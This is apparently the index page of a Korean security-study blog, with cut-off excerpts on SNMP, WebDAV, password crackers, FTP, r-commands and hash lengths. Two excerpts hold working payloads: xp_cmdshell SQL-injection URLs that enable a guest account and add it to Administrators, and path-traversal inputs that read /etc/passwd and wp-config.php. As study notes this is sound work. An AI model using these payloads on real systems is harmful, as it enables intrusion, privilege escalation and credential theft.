2017. 4. 20.

[네트워크] SNMP 취약점 관련

# SNMP 취약점 SNMP는 네트워크의 라우터의 설정을 바꿀수도 있고, 시스템에  계정을 만들 수도 있다. # SNMP 공격 SNMP 취약점으로 인한 공격으로는 서비스거부공격(DoS, DDos), 버퍼 오버플로우, 비인가 접속 등이 알려져 있다. 이러한 공격의 대부분은 SNMP를 이용한 데이터 전송이 암호화 되어 있지 않고, rw권한(read, write) 설정, 특히 패스워드와 비슷한 가치를 지니는 community string을 디폴트 값인 public 상태로 방치한다는 것에서 비롯된다.  # 공격 도구 1) NMAP 공격자 시스템에서 SNMP 가 enable 되어 있는 장치를 찾는 찾기 위함 nmap -sU -p 161 192.168.174.254/24 포트스캔...

Continue reading

2017. 4. 7.

지식정리 체크리스트 - 20170405

1. put. delete 와 같은 http 메소드가 열려있다는 이유만으로 파일을 입력, 삭제 할 수 있는지? 물론 그렇지 않다. WebDAV 서비스와 함께 원격지 웹 서버에 파일을 생성하거나 삭제하는 FTP 와 유사한 기능을 구현할 수 있다. 기본적으로 웹 게시 폴더(기본설정 - \inetpub\wwwroot)는 인터넷 사용자가 접근하는 폴더이기 때문에 인터넷 게스트 계정(IUSR_XXX)을 가지는 웹 사용자는 쓰기 권한을 가진다. 하지만, 웹 사용자가 웹을 통해 직접 내용을 쓰기 위해서는 HTTP의 확장된 기능인 WebDAV 기능이 지원되어야 한다. 즉, WebDAV 서비스를 제공하는 파일인 httpext.dll에 인터넷 게스트 권한을 포함하는 Everyone 이 모든 권한을 가지도록 할당하는...

Continue reading

2017. 4. 6.

[시스템] 비밀번호 크래킹 도구

1. Cain & Abel 윈도우용 탑 패스워드 크래킹 도구 - http://www.oxid.it 2. 존 더 리퍼 - www.openwall.com (John the Ripper 1.8.0-jumbo-1 (Windows binaries, ZIP, 34 MB) and its signature) - 해쉬 암호화 관련 문서 (https://s3.amazonaws.com/files.douglas.stebila.ca/files/teaching/cryptoworks21/Networks-Practical-Passwords.pdf) - 사용 예, http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats - john *.pwd // 여러개의 패스워드...

Continue reading

[시스템] FTP 명령여 정리

open(주소 또는 도메인) → ftp 서버에 연결 close : 해당ftp 접속종료 bye : ftp 프로그램 종료 ls : list, 목록보기 cd(디렉토리명) → 디렉토리 바꾸기 ascii : 텍스트 파일 전송모드 (자료를 내려받거나 올리기 이전에 작동시켜야 한다) bin : 이진파일 전송 모드 (자료를 내려받거나 올리기 이전에 작동시켜야 한다) get 파일명 : 하나의 파일 내려받기 mget 파일명 : 여러 개의 파일 내려받기, wildcard 문자 사용가능 put 파일명 : 하나의 파일 올리기 mput 파일명 : 여러 개의 파일 올리기, wildcard 문자 사용가능 pwd : 현재 경로보기 hash : 파일전송과정 보여주기(버터단위 ‘#” 표시 되며 자료올리거나 받기전에 명 령어를...

Continue reading

2017. 4. 5.

[웹 취약점] XP_cmdshell 취약점 관련

# 취약점 적용 대상 - 데이터베이스 운영자가 MSSQL 서버를 sa 계정으로 운영하는 경우, - MSSQL Server 2000, 2003, 2005 1. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest /active:yes'-- --> guest 계정 활성화 2. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest test'-- --> guest 계정 password를 test로 변경 3. http://victim.com/research?name=';EXEC xp_cmdshell 'net localgroup Administrator guest /add'-- //...

Continue reading

[웹 취약점] 파일 다운로드 취약점

1. 개요 홈페이지 상에서 파일을 다운받는 cgi, jsp, php, php3 등의 프로그램에서 입력되는 경로를 체크하지 않는 경우 임의의 문자(../.. 등) 나 주요 파일명의 입력을 통해 웹 서버의 홈 디렉터리를 벗어나서 임의의 위치에 있는 파일을 열람하거나 다운받는 것이 가능할 수 있음 2. 점검방법 Step 1) 게시판 또는 공지사항, 자료실 등에서 cgi, jsp, php 등의 프로그램을 이용하여 파일을 다운로드 받는 페이지가 있는지 조사 Step 2) 다음과 같이 파일 다운로드를 시도한다. ../../../../etc/passwd ../../../../winnt/win.ini ../../../../boot.ini ../../../wp-config.php 로 파일을 다운 받을 수 있다....

Continue reading

[시스템] 'r' command 보안 취약점

1. 'r' Command 개요 r'command 를 통한 원격접속은 *NET Backup 이나 다른 용도로 사용되기도 하지만, 인증 없이 원격접속을 가능하게 한다는 점에서 보안상 매우 취약하다. 2. 'r' Command 서비스 활성화 여부 확인 OS 마다 확인 방법이 약간 상이하다. 본 포스트에서는 HP-UX와 AIX 위주로 기술한다. 상세한 내용은 "주요정보통신기반시설_기술적_취약점_분석_평가_방법_상세가이드"의 U-28, U-38 항목을 참고하면 된다. 방법 1) /etc/inetd.conf 파일에서 r 계열 서비스 활성화 여부를 확인한다. 해당 서비스 라인이 # 처리 되어 있으면 비활성화된 것이다. 방법 2) netstat -an 명령어 사용 - netstat -an | grep "*.513...

Continue reading

[암호] 해쉬함수별 출력값(해쉬값) 길이

해쉬함수별 출력값(해쉬값) 길이 비교 1. md5의 출력값 길이는 128비트 md5 hash값(저장 : 16진수로 32바이트) ex) 8380482228e75045a7d14e063bde014b 2. sha-1의 출력값 길이는 160비트 sha-1 hash값(저장 : 16진수로 40바이트) ex) 764C46AE8BC50C4823E50F18DA45B9A21E8DD10B 3. sha-256의 출력값 길이는 256비트 sha-256 hash값(저장 : 16진수로 64바이트) ex) be178c0543eb17f5f3043021c9e5fcf30285e557a4fc309cce97ff9ca6182912 출처 http://egloos.zum.com/doodoodoo/v/177098...

Continue reading

Popular Posts

Recent Posts

Powered by Blogger.